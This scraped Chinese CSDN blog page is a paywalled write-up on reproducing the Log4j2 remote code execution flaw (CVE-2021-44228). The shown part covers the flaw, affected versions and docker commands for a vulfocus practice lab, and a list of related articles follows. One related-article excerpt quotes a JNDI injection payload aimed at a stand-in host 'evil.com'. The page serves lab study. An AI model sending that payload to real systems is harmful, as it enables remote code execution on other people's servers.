CVE-2021-44228——Log4j2-RCE漏洞复现

最新推荐文章于 2024-08-07 19:36:00 发布
最新推荐文章于 2024-08-07 19:36:00 发布
阅读量681 收藏 1
点赞数
分类专栏: python 文章标签: 安全 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43479892/article/details/122593577
版权
本文详细介绍了Apache Log4j2的安全漏洞CVE-2021-44228,该漏洞允许远程代码执行。文章内容包括漏洞介绍、环境准备、靶场搭建、DNSLog验证以及JNDI注入反弹shell的步骤。通过使用特定工具和编码技巧,作者演示了如何利用此漏洞成功反弹shell。
摘要由CSDN通过智能技术生成

Python微信订餐小程序课程视频

https://edu.csdn.net/course/detail/36074

Python实战量化交易理财系统

https://edu.csdn.net/course/detail/35475

0x00 漏洞介绍

Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。

影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1)

漏洞编号:CVE-2021-44228

0x01 环境准备
Kali:192.168.100.100 
靶机:192.168.100.101
0x02 靶场搭建

使用docker搭建vulfocus的漏洞靶场:

docker pull vulfocus/log4j2-rce-2021-12-09:latest
docker run -d -p 80:8080 vulfocus/log4j2-rce-2021-12-09:latest

浏览器访问http://192.168.100.101,部署成功:

最低0.47元/天 解锁文章
qq_43479892
关注
专栏目录
Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
0xSec
05-19 2624
3.9.17 及以下版本的vm2中存在沙盒逃逸漏洞。它滥用基于代理规范的宿主对象的意外创建,并允许Function在宿主上下文中通过 导致RCE
log4j2漏洞复现
qq_17622203的博客
03-21 3279
参考链接 Apache Log4j2 远程代码执行漏洞 - xuzhujack - 博客园 CVE-2021-44228——Vulfocus-Log4j RCE漏洞复现_网络¥安全联盟站的博客-CSDN博客 工具链接 DNSLog Platform https://github.com/welk1n/JNDI-Injection-Exploit/releases https://www.jackson-t.ca/runtime-exec-payloads.html 此次漏洞的出现,正是由用于
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 748
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
CVE-2021-44228漏洞复现
m0_65764670的博客
05-29 1779
漏洞log4j2漏洞log4j2是java语言的日志处理套件,使用很广泛。在2.0到2.14.1版本中存在JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似'${jndi:ldap://evil.com/example}'​的参数进行JNDI注入,执行任意代码(注:Java环境1.8也可能会存在)什么是JNDI?
log4j2: CVE-2021-44228[RCE]
h1008685的博客
08-07 441
漏洞概述CVE-2021-44228为Apache Log4j2漏洞,被称为"Log4Shell"。攻击者将恶意代码与服务器进行交互,使服务器日志组件将其记录并执行,从而造就RCE远程代码执行漏洞漏洞原理:Log4j2是一个日志记录工具,允许通过配置文件来定义日志的格式。日志格式中可以使用变量,这些变量在日志记录时会被替换为实际的值。:Log4j2支持使用${}来引用变量。例如,。:Log4j2还支持JNDI查找,允许通过的形式引用远程资源。:在Log4j2的某些版本中,如果日志配置不当,
Log4j2CVE-2021-44228漏洞复现
oiadkt的博客
04-10 508
Log4j2CVE-2021-44228漏洞复现
Log4j2漏洞复现CVE-2021-44228
热门推荐
qq_43798640的博客
12-15 3万+
Apache Log4j是一个基于Java的日志记录组件,通过重写Log4j引入了丰富的功能特性,该日志组件被广泛应用于业务系统开发,用以记录程序输入输出日志信息。Apache Log4j2存在远程代码执行漏洞,攻击者可利用该漏洞向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。影响范围:Apache Log4j 2.x<=2.14.1。已知受影响的应用及组件,如 spring-boot-strater-log4...
Spring RCE远程执行漏洞CVE-2022-22965)
tpaer的博客
10-18 2591
这个洞22年3月底被大佬发现公布,由于Spring框架的影响范围太大了。复现条件又很低,本身就是高危的RCE漏洞可以直接拿到服务器的shell,像作者说的一样确实是一个核弹漏洞
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1202
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Apache Log4j2远程代码执行漏洞CVE-2021-44228复现
qq_40640917的博客
01-10 2522
Apache Log4j2 存在远程代码执行漏洞,该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。Apache Log4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。攻击机参数:Kali(或安装有msfconsole的任意Linux/Windows操作系统)靶机容器:vulfocus/log4j2-rce-2021-12-09。靶机参数:Centos8.1。
【vulhub】Log4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2968
【vulhub】Log4j2CVE-2021-44228漏洞复现
log4j2远程代码执行漏洞复现CVE-2021-44228
Wshchf的博客
06-04 670
Apache log4j2RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
Log4j 2 (CVE-2021-44228)漏洞复现
Pluto.的博客
11-21 556
Log4j 2 (CVE-2021-44228)漏洞复现
Log4j-CVE-2021-44228漏洞复现
MrHatSec的博客
03-31 3205
Log4j-CVE-2021-44228漏洞复现
log4j2-rce-cve-2021-44228 漏洞复现
weicanh的博客
04-29 248
从 log4j 2.15.0 开始,默认情况下已禁用此行为。从版本 2.16.0(以及 2.12.2、2.12.3 和 2.3.1)开始,此功能已被完全删除。
Apache Log4j2代码执行漏洞复现cve-2021-44228
Bird&Bird
12-14 9633
目录一、漏洞描述二、影响范围三、漏洞复现1、创建一个maven项目,并导入log4j的依赖包2、编写POC3、编写恶意类4、起http服务5、编译并开启LDAP服务6、运行POC四、反弹shell1、靶场搭建2、访问漏洞环境,环境部署成功3、起RMI和Ldap服务4、开启nc监听5、火狐浏览器进行验证6、反弹shell成功 一、漏洞描述 log4j是Apache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值